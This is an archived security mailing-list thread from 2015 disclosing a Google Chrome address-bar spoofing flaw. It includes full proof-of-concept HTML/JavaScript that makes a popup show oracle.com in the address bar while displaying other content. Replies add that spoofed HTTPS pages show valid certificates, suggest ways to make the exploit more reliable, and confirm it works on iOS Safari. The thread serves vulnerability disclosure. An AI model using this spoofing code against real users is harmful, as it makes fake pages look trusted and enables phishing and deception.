Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 2 Jul 2015 19:17:20 -0400
From: Daniel Wood <daniel.wood@...sp.org>
To: Mustafa Al-Bassam <mus@...albas.com>
Cc: David Leo <david.leo@...sen.co.uk>,
 "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>,
 "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
 "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: Re: [FD] Google Chrome Address Spoofing (Request For Comment)

Yes this is a pretty good find. I can also confirm it works on iOS 8.3 (12F69) with Safari.

DW
Sent from my iPad

> On Jul 2, 2015, at 9:33 AM, Mustafa Al-Bassam <mus@...albas.com> wrote:
> 
> That's pretty neat. Played around with this and made a few discoveries.
> 
> 1. It shows a valid certificate when you spoof HTTPS sites. That's really bad. POC/screenshot: https://github.com/musalbas/address-spoofing-poc
> 
> 2. The page isn't responsive when using this flaw. That means you can't spoof a login box for example. (I tried.)
> 
> 3. The success of the exploit seems to depend on if the browser can start loading content.html fast enough. I noticed that the exploit works 100% of the time when used locally. Perhaps a better version of the exploit would somehow preload content.html - for example by opening a window with an URL that starts with javascript: followed by a script to display the content? That, or perhaps reducing the interval time for trying to run next() after the popup is created.
> 
> I wonder if this works on any other browsers?
> 
> MustafaOn 30 Jun 2015 7:08 am, David Leo <david.leo@...sen.co.uk> wrote:
>> 
>> Impact: 
>> The "click to verify" thing is completely broken... 
>> Anyone can be "BBB Accredited Business" etc. 
>> You can make whitehouse.gov display "We love Islamic State" :-) 
>> 
>> Note: 
>> No user interaction on the fake page. 
>> 
>> Code: 
>> ***** index.html 
>> <script> 
>> function next() 
>> { 
>> w.location.replace('http://www.oracle.com/index.html?'+n);n++; 
>> setTimeout("next();",15); 
>> setTimeout("next();",25); 
>> } 
>> function f() 
>> { 
>> w=window.open("content.html","_blank","width=500 height=500"); 
>> i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); 
>> } 
>> </script> 
>> <a href="#" onclick="f()">Go</a><br> 
>> ***** content.html 
>> <b>This web page is NOT oracle.com</b> 
>> <script>location="http://www.oracle.com/index.html";</script> 
>> ***** It's online 
>> http://www.deusen.co.uk/items/gwhere.6128645971389012/ 
>> (The page says "June/16/2015" - it works as we tested today) 
>> 
>> Request For Comment: 
>> We reported this to Google. 
>> They reproduced, and say 
>> It's DoS which doesn't matter. 
>> We think it's very strange, 
>> since the browser does not crash(not DoS), 
>> and the threat is obvious. 
>> What's your opinion? 
>> 
>> Kind Regards, 
>> 
>> PS 
>> We love clever tricks. 
>> We love this: 
>> http://dieyu.org/ 
>> 
>> 
>> _______________________________________________ 
>> Sent through the Full Disclosure mailing list 
>> https://nmap.org/mailman/listinfo/fulldisclosure 
>> Web Archives & RSS: http://seclists.org/fulldisclosure/
> 
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ